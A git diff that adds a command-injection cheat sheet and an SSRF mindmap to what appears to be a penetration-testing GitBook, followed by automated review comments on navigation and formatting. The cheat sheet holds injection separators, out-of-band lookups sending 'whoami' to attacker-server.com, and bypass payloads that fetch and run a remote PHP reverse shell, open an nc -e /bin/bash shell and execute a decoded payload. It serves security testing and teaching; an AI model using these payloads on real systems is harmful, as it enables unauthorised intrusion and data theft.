diff --git a/.gitbook/assets/image (26).png b/.gitbook/assets/image (26).png new file mode 100644 index 00000000..1f3c7d64 Binary files /dev/null and b/.gitbook/assets/image (26).png differ diff --git a/SUMMARY.md b/SUMMARY.md index b561fa4f..82bdc583 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -53,7 +53,7 @@ * [HTTP Parameter pollution](enumeration/web/parameter-pollution.md) * [SSTI](enumeration/web/ssti.md) * [Prototype Pollution](enumeration/web/prototype-pollution.md) - * [Tabnabbing](enumeration/web/tabnabbing.md) + * [Command Injection](enumeration/web/command-injection.md) * [Web Services](enumeration/webservices/README.md) * [APIs](enumeration/webservices/apis.md) * [JS](enumeration/webservices/js.md) diff --git a/enumeration/web/command-injection.md b/enumeration/web/command-injection.md new file mode 100644 index 00000000..c2054b44 --- /dev/null +++ b/enumeration/web/command-injection.md 
@@ -0,0 +1,92 @@ +# Command Injection + +{% hint style="info" %} +Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. +{% endhint %} + +```text +# For detection, try to concatenate another command to param value +& +; +Newline (0x0a or \n) +&& +| +|| +# like: https://target.com/whatever?param=1|whoami + +# Blind (Time delay) +https://target.com/whatever?param=x||ping+-c+10+127.0.0.1|| + +# Blind (Redirect) +https://target.com/whatever?param=x||whoami>/var/www/images/output.txt|| + +# Blind (OOB) +https://target.com/whatever?param=x||nslookup+burp.collaborator.address|| +https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address|| + +# Common params: +cmd +exec +command +execute +ping +query +jump +code +reg +do +func +arg +option +load +process +step +read +function +req +feature +exe +module +payload +run +print + +# Useful Commands: Linux +whoami +ifconfig +ls +uname -a + +# Useful Commands: Windows +whoami +ipconfig +dir +ver + +# Both Unix and Windows supported +ls||id; ls ||id; ls|| id; ls || id +ls|id; ls |id; ls| id; ls | id +ls&&id; ls &&id; ls&& id; ls && id +ls&id; ls &id; ls& id; ls & id +ls %0A id + +# Time Delay Commands +& ping -c 10 127.0.0.1 & + +# Redirecting output +& whoami > /var/www/images/output.txt & + +# OOB (Out Of Band) Exploitation +& nslookup attacker-server.com & +& nslookup `whoami`.attacker-server.com & + +# WAF bypasses +vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php +vuln=127.0.0.1%0anohup nc -e /bin/bash +vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload + + +``` + + + diff --git a/enumeration/web/ssrf.md b/enumeration/web/ssrf.md index f8699c71..50028040 100644 --- a/enumeration/web/ssrf.md +++ b/enumeration/web/ssrf.md 
@@ -225,3 +225,7 @@ header('Location: http://127.0.0.1:8080/status'); # https://h.43z.one/ipconverter/ ``` +## Mindmap + +![](../../.gitbook/assets/image%20%2826%29.png) +
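Review bot: the SUMMARY.md hunk replaces the `Tabnabbing` entry instead of adding a new one, but nothing in this patch deletes `enumeration/web/tabnabbing.md`, so that page is left orphaned from the GitBook navigation. Either keep both lines (`* [Tabnabbing](enumeration/web/tabnabbing.md)` followed by `* [Command Injection](enumeration/web/command-injection.md)`) or remove the tabnabbing file in the same commit.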
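Review bot: in the new `enumeration/web/command-injection.md`, the heading `# Both Unix and Windows supported` is misleading: `ls` and `id` are Unix commands, so what is portable across both platforms is the set of separator tokens (`;`, `|`, `&&`, `&`, `%0A`), not the command lines shown; rename the heading to something like `# Separator variants (spacing / encoding)` and keep the platform-specific commands under the `Useful Commands` sections above it. The `# WAF bypasses` block also gives no indication of what each line is meant to get past, so a one-line comment per entry would help readers, and the fenced block ends with three trailing blank lines that should be trimmed.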
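Review bot: the ssrf.md hunk adds `![](../../.gitbook/assets/image%20%2826%29.png)` with empty alt text, which renders nothing useful if the binary asset is missing and is inaccessible to screen readers; use a descriptive alt such as `![SSRF mindmap](...)`. The asset name `image (26).png` with a space and parentheses also forces the URL-encoded path, so a plain name like `ssrf-mindmap.png` would be easier to reference and to find later.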